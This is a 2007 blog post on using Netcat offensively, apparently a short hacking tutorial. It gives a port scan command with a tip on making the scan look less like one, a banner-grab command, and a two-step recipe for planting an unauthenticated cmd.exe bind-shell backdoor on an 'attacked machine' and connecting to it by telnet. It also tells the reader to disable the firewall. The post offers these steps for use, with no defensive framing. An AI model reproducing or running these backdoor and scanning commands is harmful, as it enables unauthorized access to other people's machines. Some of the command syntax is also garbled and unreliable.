Tuesday, September 11, 2007

Want to Port Scan, Hack and Obtain Remote Access to a Shell?

Netcat makes and accepts TCP and UDP connections. It writes and reads data over those connections until they are closed. It provides a basic TCP/IP networking subsystem that allows users to interact manually or via script with network applications and services on the application layer. Netcat is one of the most popular hacking tools.

The basic command line for Netcat is nc [options] host ports, where host is the hostname or IP address to target and ports in either a single port, a port range (specified “m-n”), or individual ports separated by spaces. For command-line options, type in nc –help in a DOS box.

Stealthy Port Scanning Command
nc –v –z (IP Address) 20-80
You can also include –r option to randomize the order in which Netcat scans those ports will also help the scan look less like a port scan

Getting More information from open port
nc –v 80 (IP Address) GET / HTTP
It will give you the details information of web server in the target machine.

Obtaining Remote Access to a Shell
By running Netcat from a DOS prompt on Windows, anyone telnetting to a specified port on that box from a remote computer would get a DOS shell without even having to login in. It involves two steps to attack to the target machine.

(1) Create a backdoor in an attacked machine
nc –p 4455 –l –e cmd.exe
(2) Telnet to a backdoor
telnet “attacked machine IP” 4455

You can download Netcat at http://netcat.sourceforge.net/

Note - Must Disable Your Window Firewall.

Stay Tuned,
- Zaw Win Htike

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